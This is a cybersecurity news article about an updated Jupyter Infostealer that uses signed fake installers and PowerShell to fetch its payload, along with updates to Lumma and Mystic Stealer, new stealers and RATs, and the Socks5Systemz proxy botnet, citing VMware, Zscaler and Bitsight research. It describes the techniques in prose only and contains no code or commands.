An updated version of an information stealer malware known as Jupyter has resurfaced with “simple yet impactful changes” that aim to stealthily establish a persistent foothold on compromised systems.
“The team has discovered new waves of Jupyter Infostealer attacks which leverage PowerShell command modifications and signatures of private keys in attempts to pass off the malware as a legitimately signed file,” VMware Carbon Black researchers said in a report shared with The Hacker News.
Jupyter Infostealer, also known as Polazert, SolarMarker, and Yellow Cockatoo, has a track record of leveraging manipulated search engine optimization (SEO) tactics and malvertising as an initial access vector to trick users searching for popular software into downloading it from dubious websites.
It comes with capabilities to harvest credentials as well as establish encrypted command-and-control (C2) communication to exfiltrate data and execute arbitrary commands.
The latest set of artifacts uses various certificates to sign the malware to lend them a veneer of legitimacy, only for the fake installers to activate the infection chain upon launch.
The installers are designed to invoke an interim payload that, in turn, employs PowerShell to connect to a remote server and ultimately decode and launch the stealer malware.
The development comes as stealer malware offered for sale on the cybercrime underground continues to evolve with new tactics and techniques, effectively lowering the barrier to entry for lesser-skilled actors.
This includes an update to Lumma Stealer, which now incorporates a loader and the ability to randomly generate a build for improved obfuscation.
“This takes the malware from being a stealer type to a more devious malware that can load second-stage attacks on its victims,” VMware said. “The loader provides a way for the threat actor to escalate its attack from data theft to anything up to infecting its victims with ransomware.”
Another stealer malware family that has received steady improvements is Mystic Stealer, which has also added a loader functionality in recent versions to complement its information-stealing abilities.
“The code continues to evolve and expand the data theft capabilities and the network communication was updated from a custom binary TCP-based protocol to an HTTP-based protocol,” Zscaler said in a report late last month.
“The new modifications have led to increased popularity with criminal threat actors leveraging its loader functionality to distribute additional malware families including RedLine, DarkGate, and GCleaner.”
The constantly evolving nature of such malware is further exemplified by the emergence of stealers and remote access trojans such as Akira Stealer and Millenium RAT, which come fitted with various features to facilitate data theft.
The disclosure also arrives as malware loaders like PrivateLoader and Amadey have been observed infecting thousands of devices with a proxy botnet dubbed Socks5Systemz, which has been around since 2016.
Cybersecurity firm Bitsight, which revealed details of the service last week, said it identified at least 53 servers related to the botnet that are distributed across France, Bulgaria, Netherlands, and Sweden.
The ultimate goal of the campaign is to turn infected machines into proxies capable of forwarding traffic for other actors, legitimate or otherwise, as an additional layer of anonymity. It’s suspected that the threat actors are of Russian origin, given the lack of infections in the country.
“The proxy service allows clients to choose a subscription ranging from $1 USD to $4,000 USD, payable in full using cryptocurrency,” Bitsight said. “Based on network telemetry analysis, it is estimated that this botnet has approximately 10,000 infected systems with victims spread across the globe.”